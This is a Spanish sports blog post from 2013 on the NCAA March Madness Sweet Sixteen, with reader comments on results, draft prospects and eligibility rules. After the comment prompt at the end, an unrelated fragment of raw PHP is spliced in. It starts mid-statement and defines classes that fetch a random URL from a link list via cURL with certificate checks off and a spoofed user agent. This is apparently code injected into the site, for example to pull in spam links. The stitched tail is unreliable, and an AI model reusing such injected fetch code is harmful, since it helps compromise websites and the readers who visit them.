March Madness 2013: Sweet Sixteen

25 de March de 2013 por txusma

Ya tenemos a los 16 equipos que se jugarán el próximo fin de semana el pase a la Final Four. No han fallado Louisville, Indiana ni Kansas pero Gonzaga ya se ha quedado en el camino. Además, por primera vez en la historia el décimoquinto equipo de una región se ha clasificado para esta ronda. Se trata de los Florida Gulf Coast que han conseguido la hazaña tras eliminar a uno de los grandes favoritos, los Hoyas de Georgetown. Repasamos los 16 clasificados:

MIDWEST REGION

Muchos analistas y aficionados consideraban ridículo que los Ducks hubieran sido clasificados tan bajos en la región. Su pase al “Sweet Sixteen” tras superar con claridad a equipos teóricamente superionres como Oklahoma State y Saint Louis demuestran que el comité infravaloró al equipo de Oregon. Con Arsalan Kazemi en el juego interior (16’5 rebotes de media) y Damyean Dotson por fuera, los Oregon Ducks están preparados para enfrentarse a uno de los grandes favoritos para ganar el campeonato. Los Cardinals no han pasado ningún apuro en ninguno de los 2 partidos jugados y se han plantado en esta ronda sin apenas sudar. Russ Smith ha destapado el frasco de las esencias y nos ha dejado 2 actuaciones enormes (23 puntos y 8 robos ante NC St. y 27 puntos ante Colorado St.)

En el otro lado del cuadro, Duke y Michigan State se jugarán el pase a los Elite Eight. Los Blue Devils tampoco han sudado mucho para llegar aquí pero ahora se encontrarán con una auténtica piedra de toque. Gary Harris está absolutamente on fire y los Spartans tienen armas para parar a Seth Curry y Sulaimon. La pelea bajo los tableros puede ser la clave del enfrentamiento. 

WEST REGION

A Ohio State parece que se le aclara el camino. Tras eliminar fácilmente a Iona en primera ronda y sudar para imponerse a Iowa State gracias a un triplazo de Aaron Craft, ahora les toca enfrentarse a Arizona. New Mexico cayó en primera ronda ante los “sabiondos” de Harvard y Arizona aprovechó el regalo en la 2ª ronda para plantarse en el Sweet Sixteen con facilidad. DeShaun Thomas está respondiendo a las expectativas y ha anotado 22 y 24 puntos en los 2 primeros partidos.

De todas maneras, los Wildcats no lo pondrán nada fácil porque saben que en caso de ganar tienen muchas opciones de llegar a la Final Four. En el otro lado del cuadro se enfrentan, sorprendentemente, Wichita y LaSalle. Los primeros se cargaron a Pittsburgh  en 1ª ronda a pesar de los 13 puntos y 11 rebotes de Steven Adams y después consiguieron la machada eliminado a Gonzaga. Los Bulldogs ya no dejaron buenas sensaciones en 1ª ronda y se pegaron de bruces contra el buen acierto de los Shockers desde la línea de 3. Kelly Olynyk ha jugado a buen nivel pero Elias Harris ha decepcionado profundamente. Por su parte, los Explorers de LaSalle llegan al Sweet Sixteen tras ganar 2 partidos de forma agónica, ambos de 2 puntos. Lo normal es que Wichita pasara pero tras eliminar a Kansas State y Ole Miss, los Explorers están con la moral muy alta.

SOUTH REGION

Los Eagles de la universidad de Florida Gulf Coast han hecho historia. Nunca ante un equipo clasificado como el décimoquinto de su región había llegado al Sweet Sixteen. Lo mejor es que lo han conseguido con un juego alegre, diviertiéndose en la cancha, lejos de la tensión que parece atenazar a la mayoría de participantes. En primera ronda eliminaron a Georgetown, 2ª cabeza de serie y en 2ª ronda, a los Aztecs de San Diego, ambas victorias sin pasar apuros al final del partido. Ahora el reto será mayor: vencer a la archipoderosa universidad de su estado: Florida. Los Gators no están para bromas y llegan muy fuertes al choque, con Erik Murphy con la escopeta a punto. Las victorias de FGC nos han dejado sin Otto Porter, de los Hoyas, y Jamaal Franklin, de los Aztecs. Ambos jugadores lo han hecho bastante bien en los partidos que han disputado.

La otra eliminatoria se decidirá entre los 2 equipos previstos: Kansas y Michigan. Los Jayhawks pasaron más apuros de los previstos en 1ª ronda y eliminaron a North Carolina en 2ª a pesar del terrible partido de su juego exterior. Ben McLemore falló los 9 tiros que intentó y ya no estuvo muy fino en el primer partido. Suerte que Jeff Withey está tan sólido como se preveía. Por contra, parece que los Wolverines llegan más mucho más sólido con, precisamente, un trío exterior en estado de gracia. Glen Robinson III, Tim Hardaway Jr. y Trey Burke pueden ser demasiado para Kansas.

EAST REGION

Nadie se habrá hecho rico apostando en la East Region. Los 4 cabezas de serie se han plantado en los Sweet Sixteen a pesar de sudar la gota gorda en la 2ª ronda. Victor Oladipo apareció para rescatar a unos Hoosiers que a 3 minutos para acabar el partido estaban por detrás en el marcador. Su rival será Syracuse, que si bien en 1ª ronda humillaron a su rival (ganaron de 47 puntos), en 2ª tuvieron que bajar al barro y plantar una sofocante zona para imponerse a California. Los Orange estuvieron 12 minutos sin anotar un solo tiro de campo y aún así ganaron. El poder de la defensa.

El otro partido enfrentará a Marquette y Miami. Los Golden Eagles están ya proyectando una estatua para Vander Blue, que anotó una bandeja sobre la bocina en el partido de 1ª ronda para dar la victoria su equipo, y se fue a los 19 puntos en la 2ª parte del partido de la 2ª ronda. Por su parte, los Hurricanes llegan tras vencer por los pelos a Illinois gracias a un postrero triple de Shane Larkin. Si quieren llegar al Elite Eight deberán imponer su juego interior y parar a uno de los mejores 5 jugadores del torneo.

Comenta

23 comentarios a esta entrada

  1. Ruxixón dice:
    #1

    De momento decepcionante el torneo,refiriéndose al nivel de los máximos favoritos de cara al draft.De los 10 primeros en la página nbadraft sólo los dos Hoosiers han justificado su status.Oladipo bien y Cody Zeller en su línea,que trasladada a nivel NBA quiere decir que le van a llover hostias por todos lados y que posiblemente dos veranos a base de gimnasio sean el plazo para poder ver a un gran jugador a ese nivel.Subiendo en los mocks están los Deshaun Thomas,Wyatt,Withey…jugadores de varios años en la universidad que aparecen en los últimos puestos de primera ronda o directamente en la segunda.

    UNC eliminada a manos de los Jayhwaks.Era lo esperado puesto que hay más variedad de recursos en Kansas y sobre todo cuentan con Withey que aunque pensando en un futuro no será gran cosa ha crecido mucho en la NCAA y prácticamente es un factor diferencial.Empezamos mejor pero no pudo ser y en la segunda parte finito.Mucha culpa la tuvo Releford el cual me cae rematadamente mal ya desde el año pasado siendo compañero de Thomas Robinson.

    McLemore debe aparecer contra Michigan si o si y aparcar su hasta ahora mal torneo.Los hijísimos,Burke y McGary (duelo vs Withey promete) es mucho para esperar una mala versión del posible nº1 del draft.

    Apuesta por las finales:

    MIDWEST- Louisville (el equipo más sólido hasta ahora) – Spartans (D-Fense)
    SOUTH- Michigan – Florida
    WEST- Wichita – Ohio State
    EAST- Indiana – Marquette

      Citar

  2. Ruxixón dice:
    #2

    Por la parte baja del cuadro ha caído la otra favorita,Indiana,a manos de los Orange de Syracuse con un gran Carter-Williams,el base de los dos metros.Cody Zeller y Oladipo verán las finales desde sus casas.

    Y los últimos minutos del OSU – Arizona fueron tremendos,2+1 de estos últimos para empatar el partido a 70.Jugada para Craft,que recordemos metió el triple de la victoria en la pasada ronda,dos hombres sobre él,se la pasa a LaQuinton Ross que mete un triplazo a falta de 2 segundos para ganar el partido.Sensacional el torneo de Deshaun Thomas,esta noche autor de 20 puntos.

    Tenemos dos finales configuradas: Wichita – Ohio State y Syracuse – Marquette.Hoy el partidazo Kansas – Michigan.

      Citar

  3. Txusma dice:
    #3

    Ya solo nos queda un número 1, Louisville que pasó a los Elite Eight con la enésima exhibición de Russ Smith y eso q estaba medio enfermo. De momento creo q es el mejor jugador del torneo, por encima de Deshaun Thomas y Aaron Craft, ambos de Ohio State. Lo gracioso es q todos serían 2ª rondas. Habrá q ver si suben puestos en el draft gracias a sus grandes torneos. A Kansas lo eliminó Michigan en la prórroga con Trey Burke en estado de gracia. Primer buen partido de McLemore…

    Hoy se juega el Ohio State – Wichita, con claro favorito y un apasionante Syracuse – Marquette.

      Citar

  4. Txusma dice:
    #4

    Pues Wichita se ha cargado a Ohio State y Syracuse deja a Marquette en 39 puntos…

    Mañana resumen!

      Citar

  5. thewolf dice:
    #5

    Espeluznante lo de Kevin Ware en Louisville… tremendo (los aprensivos mejor que no miren) http://www.youtube.com/watch?v=M_sJP_0LHjA

      Citar

  6. MagicJohnson32 dice:
    #6

    thewolf:
    Espeluznante lo de Kevin Ware en Louisville… tremendo (los aprensivos mejor que no miren) http://www.youtube.com/watch?v=M_sJP_0LHjA

    Mira, hace un minuto que lo he publicado: http://blog.tjnba.com/2013/04/01/escalofriante-lesion-de-kevin-ware-en-el-louisville-duke/

    Pone los pelos de punta, pobre chaval…

      Citar

  7. The wolf dice:
    #7

    A pesar de todo van a ganar… me gusta mucho Louisville y una pena que se vaya Duke, me caia simpatico el hermano de Curry

      Citar

  8. Jose Luis dice:
    #8

    Estoy deseando ver la previa de Final Four y los partidos del sábado y martes

      Citar

  9. Denise dice:
    #9

    Y los “buenos” …(Mc Lemore, Smart, Zeller, Alex Len, Oladipo, Shabazz y está gente Top 5).. como están jugando? ¿Sus equipos tienen posibilidad de Final Four? ¿Hay algun desconocido que esté haciendo un enorme torneo que haga que pueda colarse en el Top 10 del Draft?

      Citar

  10. Txusma dice:
    #10

    En cuanto Melo me envíe su parte, publicaremos el resumen del fin de semana. Puede ser de cara a mañana por la tarde, eso sí.

      Citar

  11. Jose Luis dice:
    #11

    Si no me equivoco, todos los que dices están eliminados o ni siquiera se clasificaron.

    Los Final Four son Louisvile vs Wichita y Michigan vs Syracuse.

    De Wichita no sé a quién destacar. Por parte de Louisville buenos partidos de Smith (7-14 TC, 9-12 TL) y Dieng (6-8, 14 puntos, 11 rebotes, 4 tapones). La pena los tiros libres, 2-8…

    Michael Carter Williams, el base de 2 metros, sigue adelante con Syracuse. 12 puntos, 8 rebotes, 6 asistencias, 5 robos vs Marquette. Trey Burke (15p,8r,7a, 5-16 en tiros) creo que es el principal jugador de Michigan.

    De los que se suponen top 10 del draft no queda ni uno… tengo ganas de ver a Carter-Williams en la NBA, espero que sea top-20 fijo, quizá top-15

      Citar

  12. Txusma dice:
    #12

    Después de la March Madness publicaremos el primer mock.

    Yo de lo que he visto hasta el momento me ha gustado Russ Smith de Louisville q seguro subirá muchas posiciones en el draft. Estaba por la mitad de la 2ª ronda.
    De los grandes, me quedo con Victor Oladipo sin dudarlo.

      Citar

  13. Denise dice:
    #13

    Ok, gracias…una pregunta más, en la NCAA solo participan universitarios o tambien pueden participar jugadores NBA sin sitio en la liga con 30 y pico años? Mi conocimiento NCAA es cero.

      Citar

  14. safd dice:
    #14

    En la NCAA no puede jugar nadie que haya cobrado un centimo por el baloncesto. De hecho por eso creo que Enes Kanter no pudo jugar con Kentucky y Shabazz Muhammad ya tuvo muchos problemas con eso este año, se perdio unos pocos partidos.

      Citar

  15. Denise dice:
    #15

    safd:
    En la NCAA no puede jugar nadie que haya cobrado un centimo por el baloncesto. De hecho por eso creo que Enes Kanter no pudo jugar con Kentucky y Shabazz Muhammad ya tuvo muchos problemas con eso este año, se perdio unos pocos partidos.

    ahhh, interesante, es decir, que Brandon Jennings no hubiese podido jugar en la NCAA tras su paso por Roma..

      Citar

  16. Jose Luis dice:
    #16

    Efectivamente:

    Enes Kanter: Con esa carta de presentación los mejores equipos de la NCAA se interesaron por él, decidiéndose el turco en un principio por la propuesta de la Universidad de Washington. Luego se arrepintió y rompió su compromiso con los ‘Huskies’ enrolándose en la Universidad de Kentucky. Desafortunadamente para él la NCAA investigó su caso y lo declaró inelegible para jugar al considerar que había cobrado dinero en Turquía, obligándole a pasarse un año sin jugar.

      Citar

  17. Txusma dice:
    #17

    Denise: ahhh, interesante, es decir, que Brandon Jennings no hubiese podido jugar en la NCAA tras su paso por Roma..

    De hecho, Brandon Jennings renunció a jugar en la universidad para venirse a Europa tras ser de los mejores en High School. Tb es cierto que tenía muchos problemas para alcanzar el mínimo nivel académico exigible (que mira que ha de ser bajo para este gente). Lo cierto es que abrió un nuevo camino que creo que casi nadie más ha explorado.
    Otro caso distinto fue el de Latavious Williams, ex del Joventut y q está ahora, creo q en el Cajasol. Tb tuvo muchos problemas para llegar al nivel académico y no le llegaron ofertas del extranjero así que se fue a la D-League.

      Citar

  18. Denise dice:
    #18

    Gracias tios por la info, molaría si pusieseis la posibilidad de dar “likes”, vuestros ultimos comentarios lo merecen.

    Ja, no es por prejuzgar pero el Latavious tiene una pinta de cabeza hueca…

      Citar

  19. melo15 dice:
    #19

    Entonces un jugador que quiere pasarse del la High School a la NBA directamente podria pasar a la D-League y en nada ya esta en la NBA no? Porque los equipos pueden fichara a cualquiera de la NBA

      Citar

  20. safd dice:
    #20

    melo15:
    Entonces un jugador que quiere pasarse del la High School a la NBA directamente podria pasar a la D-League y en nada ya esta en la NBA no? Porque los equipos pueden fichara a cualquiera de la NBA

    mmmmm… No. No se si a la D-League se puede entrar sin pasar por la NCAA o entrar con 18 años nada mas que es como sales de HS, pero esque eso da igual, porque para jugar en la NBA con menos de 23 años te tienes que presentar al draft y la edad minima para presentarte es 19…

      Citar

  21. Jose Luis dice:
    #21

    Joder safd, que dominio del tema. Fantástica explicación, chapeau para ti

      Citar

  22. txusma dice:
    #22

    safd: mmmmm… No. No se si a la D-League se puede entrar sin pasar por la NCAA o entrar con 18 años nada mas que es como sales de HS, pero esque eso da igual, porque para jugar en la NBA con menos de 23 años te tienes que presentar al draft y la edad minima para presentarte es 19…

    Justamente. El caso de Latavious es particular pq tenían tan malas notas que tuvo q pasarse un año más en una HS privada. Salió de allí con 19 años así que ya podía ir donde quisiera/pudiera.

      Citar

  23. Ruxixón dice:
    #23

    Este año está la cosa fastidiada para ver la MM en condiciones,todavía hoy acabé de ver el partido de Michigan contra Kansas aunque la espera mereció la pena.McLemore aunque con destellos pasa desapercibido mucho tiempo y en la prórroga y en los instantes calientes ni se le ha visto.Todo lo contrario que Burke que se llevó el partido el solito…bueno,solo no,que está ahí ese McGary que uno le ha robado el corazón xDD

    Vaya sorpresón lo de OSU a manos de Wichita,no me lo esperaba la verdad.Aún así Deshaun Thomas es uno de los jugadores del torneo y supongo que se meterá en una primera ronda media.

    Ese duelo Carter Williams – Burke promete,la diferencia de condiciones físicas es palpable.Vamos con Michigan en un posible duelo con L’ville en la final,el mejor equipo de la competición y máximo favorito.Espero que lo de Ware sirva de motivación y que no se vengan abajo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>